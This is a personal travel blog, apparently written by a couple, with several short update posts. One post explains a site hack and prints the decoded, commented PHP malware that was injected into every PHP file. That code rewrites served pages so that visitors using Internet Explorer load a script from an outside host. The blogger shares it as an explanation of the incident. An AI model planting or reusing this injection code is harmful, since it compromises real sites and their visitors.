Falling behind

So, the blog’s fallen behind a little!

I’ve just added some new posts about the end of our time in Brazil, and a few more will follow shortly. Since we’re posting them with the date we were at the place rather than the date
they were uploaded, they’re appearing below the more recent stuff – so scroll on down to see them!

Thanks,
Simon

How embarassing!

Well, it appears that some nasty spammer managed to add some JavaScript to the footer of this Blog, and so if you’ve accessed it recently using Internet Explorer you should make sure your anti-virus is up to date.

I’m still looking into what happened, and since we’re about to go offline for a week, I’ve temporarily hobbled the blog slightly to prevent the spam from showing. This means that some pages might not work quite as expected ( eg the where are we map). We’re still here and normal service will be resumed in a bit.

We’re very sorry for the inconvenience; we have no desire to have any advertising or whatnot pop up while you’re gracing us with your time!

Many thanks to Laura’s Dad for pointing this out, hopefully it won’t happen again

Update, September 22nd

So it turns out my hobbling above still didn’t fix the problem. I’ve finally cleared things out and all should now be fine. If anyone’s interested, it looks like we were hit by a variant of this: http://sucuri.net/malware/malware-entry-mwmrobh2

I’m still unclear on the infection route, but think it probably happened due to brute force guessing of our admin password, which has now been changed, along with everything else.

The problem code inserted a base64 encoded string to be evaluated in each php file, which evaluates as the following (comments added by me).

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no']))
{
  $GLOBALS['mr_no']=1;   
  if(!function_exists('mrobh')){      
    if(!function_exists('gml')){    
      function gml(){      
        if (stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")
           ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")
           ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")
           ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){       
        return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3Rzbm93LmNvbS9ubC5waHA/bm5uPTEiPjwvc2NyaXB0Pg==");      
            }      return "";     
        }
        // That <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1"></script>  
        // which is the suspect javascript
    }        

// This then sets the output buffer to rewrite each page and drop the above script just before
// the </body> tag. Cunning, especially with the gzdecode stuff.
if(!function_exists('gzdecode')){     
  function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){      $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));      $RBE4C4D037E939226F65812885A53DAD9=10;      $RA3D52E52A48936CDE0F5356BB08652F2=0;      if($R30B2AB8DC1496D06B230A71D8962AF5D&4){       $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));       $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];       $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&8){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&16){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&2){       $RBE4C4D037E939226F65812885A53DAD9+=2;      }      $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){       $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      }      return $R034AE2AB94F99CC81B389A1822DA3353;     }    }    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){     Header('Content-Encoding: none');     $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);       if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);     }else{      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();     }    }    ob_start('mrobh');   }  }

(Ah, that brings back some memories of Slang from GS… Dynamic function definitions, oh yes)

Anyway, all should be good now. Hopefully we don’t get hacked again tonight!

Simon

The daily blog

We’ve just got internet for the first time in a week and so there’s a whole bunch of new posts below.

In case you think I’ve become addicted to writing blog posts, maybe I have, but I’m quite enjoying it! This is essentially my travel diary since I don’t have the artistic skills Laura has to produce a beautiful scrapbook. I’m not expecting anyone to read any or all of it – although of course you’re welcome!

We’re marking posts with the day they’re written rather than than when they’re posted online, so you might find posts suddenly appearing for days in the past.

One other thing – at the moment all the photos on this blog are from an iPhone. We’re hoping to spend some time going through the ones from our cameras, and the good ones will be up on flickr soon – possibly in the next few days depending on how much time we have in Kathmandu.

Simon